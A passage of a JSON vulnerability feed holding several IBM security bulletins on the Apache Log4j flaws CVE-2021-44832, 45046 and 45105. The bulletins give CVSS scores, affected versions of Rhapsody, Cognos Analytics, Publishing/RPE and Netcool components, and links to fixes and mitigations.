"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-27T21:21:42", "type": "ibm", "title": "Security Bulletin: IBM Engineering Systems Design Rhapsody (Rhapsody) is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-27T21:21:42", "id": "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "href": "https://www.ibm.com/support/pages/node/6540566", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:00", "description": "## Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105) which is used by IBM Engineering Lifecycle Optimization - Publishing (PUB) and Rational Publishing Engine (RPE) Knowledge Center for logging . The fix includes upgrade to Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Engineering Lifecycle Optimization - Publishing (PUB)| 7.0.2 \nIBM Engineering Lifecycle Optimization - Publishing (PUB)| 7.0.1 \nIBM Engineering Lifecycle Optimization - Publishing (PUB)| 7.0 \nRational Publishing Engine (RPE)| 6.0.6.1 \nRational Publishing Engine (RPE)| 6.0.6 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin.**\n\nThe Knowledge Center Component for a Locally installed Help Server (KCCI) that is (optionally) installed and configured for the following products: **IBM Engineering Lifecycle Optimization - Publishing (PUB) **(7.0,7.0.1,7.0.2) and **Rational Publishing Engine (RPE) **(6.0.6, 6.0.6.1) will need to be updated. Find the version corresponding to your offering, click the link, and follow the instructions to remediate your offering.\n\n * [Rational Publishing Engine (6.0.6](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Rational+Publishing+Engine&release=6.0.6&platform=Windows&function=fixId&fixids=Knowledge-Center-Update-V2-RPE-Publishing&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"Rational Publishing Engine 6.0.6\" ))\n * [Rational Publishing Engine (6.0.6.1](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm~Rational&product=ibm/Rational/IBM+Rational+Publishing+Engine&release=6.0.6.1&platform=Windows&function=fixId&fixids=Knowledge-Center-Update-V2-RPE-Publishing&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"Rational Publishing Engine 6.0.6.1\" ))\n * [IBM Engineering Lifecycle Optimization - Publishing (7.0, 7.0.1, 
7.0.2)](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Lifecycle+Optimization+-+Publishing&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-V2-RPE-Publishing&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM Engineering Lifecycle Optimization - Publishing \\(7.0, 7.0.1, 7.0.2\\)\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n13 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6RHZ\",\"label\":\"Rational Publishing Engine\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"6.0.6,6.0.6.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSUBFB\",\"label\":\"IBM Engineering Lifecycle Optimization - Publishing\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.0,7.0.1,7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T20:44:45", "type": "ibm", "title": "Security Bulletin: IBM Engineering Lifecycle Optimization - Publishing is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": 
"software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-13T20:44:45", "id": "08FF14BF18D2D8DEA2BCD9900A4BED9C481C9700F7CF99B6CD1B3F7EDA9C3865", "href": "https://www.ibm.com/support/pages/node/6540672", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:40:25", "description": "## Summary\n\nIBM Cognos Analytics is affected by a security vulnerability. Apache Log4j is used by IBM Cognos Analytics as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-45046) vulnerability. IBM Cognos Analytics has upgraded Apache Log4j to v2.16. This update also addresses CVE-2021-44228. Please note that this Security Bulletin has been superseded by Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832). See References section below.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Analytics 11.2.x\n\nIBM Cognos Analytics 11.1.x\n\nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n## Remediation/Fixes\n\nTwo links have been provided for each Interim Fix. The majority of clients will access the Interim Fix via the link under Fix Version. For clients who have IBM Cognos Analytics by way of another product such as IBM Planning Analytics, IBM Cognos Controller, IBM OpenPages, etc. 
you will access the Interim Fix via the link under the Bundled Customers.\n\nAffected Version\n\n| \n\nFix Version\n\n| \n\nBundled Customers \n \n---|---|--- \n \nIBM Cognos Analytics 11.2.x\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3](<https://www.ibm.com/support/pages/node/6525670>)\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.2.1-BA-CA-BNDL-IF003:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nIBM Cognos Analytics 11.1.x\n\n| [IBM Cognos Analytics 11.1.7 Interim Fix 9](<https://www.ibm.com/support/pages/node/6525664> \"\" ) | [IBM Cognos Analytics 11.1.7 Interim Fix 9 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.1.7-BA-CA-BNDL-IF009:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc>) \n \nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5](<https://www.ibm.com/support/pages/node/6525666>)\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.0.13-BA-CA-BNDL-IF005:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nCVE-2021-45046 and CVE-2021-44228 have been remediated on all IBM Cognos Analytics on Cloud environments.\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Analytics team have developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers.\n\nThe single version of the 
patch is applicable to IBM Cognos Analytics versions 11.0.6 to 11.0.13 FP4, 11.1.x and 11.2.x. \n\nThe log4jSafeAgent file that is provided for Cognos Analytics modifies the class byte code at the Java startup time. It removes the vulnerable JNDI lookup, and enforces the StrSubstitutor recursion limit without altering the installed product.\n\nIt effectively rewrites the \u201corg/apache/logging/log4j/core/lookup/JndiLookup\u201d class to remove its content during IBM Cognos Analytics start up.\n\nTo get the patch and detailed instructions, click this link: [log4jSafeAgent](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=Cognos&product=ibm/Information+Management/Cognos+Analytics&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-MP-log4jFix&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"<log4jSafeAgent2021>\" ) \n \nBundle Customers can use the following link: [log4jSafeAgent Bundled](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-BNDL-log4jFix:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" )\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n[Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538720> \"\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product 
Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n20 April 2022 Updated Fix Version links for CA 11.x Bundle Customers to point to latest Interim Fix that address Apache log4j vulnerabilities \n13 Jan 2022 Updated Fix Version links for Bundle Customers to point to latest Interim Fixes that address Apache log4j vulnerabilities \n10 Jan 2022: Updated Fix Version titles to reflect updated latest IF version available. Updated the reference to the latest Security Bulletin that supersedes this one. Added more technical context to the Workarounds / Mitigations section and clarified the different links available in the Remediation / Fixes section. \n22 Dec 2021: IBM Cloud and Cloud Hosted instances remediation completion added to Remediation/Fixes \n21 Dec 2021: Modified Mitigation instructions to point to .jar and .pdf \n20 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTSF6\",\"label\":\"Cognos Analytics\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"11.2, 11.1, 11.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-20T19:29:59", "type": "ibm", "title": "Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], 
"modified": "2022-04-20T19:29:59", "id": "990B694F8FEB56054D99331B4B4370CE96BC2A4FD7C4E2B75B5E537A91E83D24", "href": "https://www.ibm.com/support/pages/node/6528388", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:43:38", "description": "## Summary\n\nMultiple vulnerabilities were identified within the Apache Log4j library (CVE-2021-45046, CVE-2021-45105) that is used by Netcool Operations Insight to provide logging functionality.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. 
\nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nNetcool Operations Insight| 1.4 \nNetcool Operations Insight| 1.5 \nNetcool Operations Insight| 1.6 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now.**\n\nPlease take careful inventory of components downloaded at any time and be sure to apply the remediations for any component that may have been installed whether or not it is currently in use.\n\nTo address the recent Apache Log4j vulnerabilities, **all** installed components must be upgraded.\n\n**Redhat Openshift Platform**\n\nIf you are on a version between 1.4 and 1.6.2 move to IBM Netcool Operations Insight V1.6.3 on Red Hat OpenShift.\n\n<https://www.ibm.com/support/knowledgecenter/en/SSTPTP_1.6.3/com.ibm.netcool_ops.doc/soc/integration/task/soc_int_upgrade_cloud.html>\n\nInstall the recommended fix v1.6.3.2 as per\n\n<https://www.ibm.com/support/pages/node/6527810>\n\nThe fix includes Apache Log4j 2.17.1. \n \n--- \n \n**Traditional On Premise**\n\n| \n\n** **\n\n| \n---|---|--- \n**On Premise Component Product**| **IBM Netcool Operations Insight Version(s)**| **Remediation Steps** \n \nIBM Netcool Agile Service Manager\n\n| \n\n1.4-1.6\n\n| \n\nSee [Security Bulletin: IBM Netcool Agile Service Manager is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6549838> \"Security Bulletin: IBM Netcool Agile Service Manager is vulnerable to arbitrary code execution and denial of service due to Apache Log4j \\(CVE-2021-44832, CVE-2021-45046, CVE-2021-45105\\)\" )\n\nThis includes Apache Log4j 2.17.1. 
\n \nIBM Cognos Analytics\n\n| \n\n1.6\n\n| \n\nPlease see steps for Bundled Customers in the Remediation section of [Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538720> \"Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities \\(CVE-2021-45105, CVE-2021-44832\\)\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Db2\n\n| \n\n1.4-1.6\n\n| \n\nSee[ Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6528672> \"Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \\(CVE-2021-45046, CVE-2021-45105\\)\" )\n\nThis includes Apache Log4j 2.17.0. \n \nIBM Jazz for Service Management| 1.4-1.6| \n\nSee [Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerabilities(CVE-2021-45105, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6536710> \"Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerabilities\\(CVE-2021-45105, CVE-2021-45046\\)\" )\n\nThis includes Apache Log4j 2.17.0.\n\nA further update is available\n\nSee [Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerability (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6539412> \"Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerability \\(CVE-2021-44832\\)\" )\n\nThis includes Apache Log4j 2.17.1. 
\n \nIBM Tivoli Netcool Impact| 1.4-1.6| \n\nSee [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM Tivoli Netcool Impact (CVE-2021-45105, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6538694> \"Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM Tivoli Netcool Impact \\(CVE-2021-45105, CVE-2021-45046\\)\" )\n\nThis includes Apache Log4j 2.17.0.\n\nA further update is available\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects IBM Tivoli Netcool Impact (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538696>)\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Netcool/Omnibus| 1.4-1.6| \n\nSee [Security Bulletin: Tivoli Netcool/Omnibus installation contains vulnerable Apache Log4j code (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6552546> \"Security Bulletin: Tivoli Netcool/Omnibus installation contains vulnerable Apache Log4j code \\(CVE-2021-44832, CVE-2021-45046, CVE-2021-45105\\)\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Tivoli Netcool/OMNIbus Probes and Gateways| 1.4-1.6| \n\nSee [Netcool/OMINbus Integrations Release Notice - Transport Module Common Integration Library](<https://www.ibm.com/support/pages/node/256461?myns=swgtiv&mynp=OCSSSHTQ&mync=E&cm_sp=swgtiv-_-OCSSSHTQ-_-E> \"Netcool/OMINbus Integrations Release Notice - Transport Module Common Integration Library\" )\n\nand\n\n[Netcool/OMNIbus Integrations Release Notice - Java Netcool Utility Library](<https://www.ibm.com/support/pages/node/255019?myns=swgtiv&mynp=OCSSSHTQ&mync=E&cm_sp=swgtiv-_-OCSSSHTQ-_-E> \"Netcool/OMNIbus Integrations Release Notice - Java Netcool Utility Library\" )\n\nThese include Apache Log4j 2.17.1. 
\n \nIBM Tivoli Netcool/OMNIbus Web GUI\n\n| \n\n1.4-1.6\n\n| \n\nSee [Security Bulletin: IBM Tivoli Netcool/OMNIbus Web GUI is vulnerable to multiple Apache Log4j vulnerabilities (CVE-2021-45046,CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6537564> \"Security Bulletin: IBM Tivoli Netcool/OMNIbus Web GUI is vulnerable to multiple Apache Log4j vulnerabilities \\(CVE-2021-45046,CVE-2021-45105\\)\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Network Performance Insight\n\n| \n\n1.6.0-1.6.2\n\n| \n\nThere is an interim fix available on FixCentral at [(1.3.1.0-TIV-NPI-IF0005)](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FTivoli%2FNetwork+Performance+Insight&fixids=1.3.1.0-TIV-NPI-IF0005&source=SAR&function=fixId&parent=ibm/Tivoli> \"\\(1.3.1.0-TIV-NPI-IF0005\\)\" )\n\nThis includes Apache Log4j 2.17.0. \n \nIBM Operations Analytics - Log Analysis\n\n| \n\n1.4-1.6\n\n| \n\nSee [Security Bulletin: Log4j remote code execution vulnerability in Apache Solr and Logstash shipped with IBM Operations Analytics - Log Analysis (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6527250>)\n\nIf Apache Log4j CVE-2021-44228 has already been addressed by executing the steps documented in the bulletin above, they do not have to be duplicated.\n\nThis includes Apache Log4j 2.17.0. \n \nIBM Operations Analytics - Predictive Insights| 1.4-1.6| \n\nSee [Security Bulletin: A vulnerability in Apache log4j (CVE-2021-45105) affects IBM Operations Analytics Predictive Insights](<https://www.ibm.com/support/pages/node/6541268> \"Security Bulletin: A vulnerability in Apache log4j \\(CVE-2021-45105\\) affects IBM Operations Analytics Predictive Insights\" )\n\nThis includes Apache Log4j 2.17.1. 
\n \nIBM Tivoli Business Service Manager (TBSM)| 1.4-1.6| \n\nFor IBM Tivoli Netcool Impact:\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM Tivoli Netcool Impact (CVE-2021-45105, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6538694> \"Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM Tivoli Netcool Impact \\(CVE-2021-45105, CVE-2021-45046\\)\" )\n\nThis includes Apache Log4j 2.17.0.\n\nA further update is available\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects IBM Tivoli Netcool Impact (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538696>)\n\nThis includes Apache Log4j 2.17.1.\n\n________________________________________________________\n\nFor Websphere Application Server:\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server \\(CVE-2021-45105, CVE-2021-44832\\)\" )\n\nThis removes Apache Log4j from IBM Websphere Application Server.\n\n________________________________________________________\n\nIf Apache Log4j CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 have already been addressed by executing the steps documented in the bulletins above relating to those components, they do not have to be duplicated. 
\n \nIBM Tivoli Netcool Configuration Manager| 1.4-1.6| \n\nFor Websphere Application Server:\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server \\(CVE-2021-45105, CVE-2021-44832\\)\" )\n\nThis removes Apache Log4j from IBM Websphere Application Server.\n\n________________________________________________________\n\nIf Apache Log4j CVE-2021-45105 and CVE-2021-44832 have already been addressed by executing the steps documented in the bulletin above relating to the component, they do not have to be duplicated. \n \nIBM Tivoli Network Manager IP Edition| 1.4-1.6| \n\nSee [Interim Fix 4.2.0.14-TIV-ITNMIP-LinuxAll-IF1](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FTivoli+Network+Manager+IP+Edition&fixids=4.2.0.14-TIV-ITNMIP-LinuxAll-IF1&source=SAR> \"Interim Fix 4.2.0.14-TIV-ITNMIP-LinuxAll-IF1\" )\n\nand follow instructions in ReadMe to remediate.\n\nThis includes Apache Log4j 2.17.1. \n \nIBM WebSphere Application Server| 1.4-1.6| \n\nSee [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect 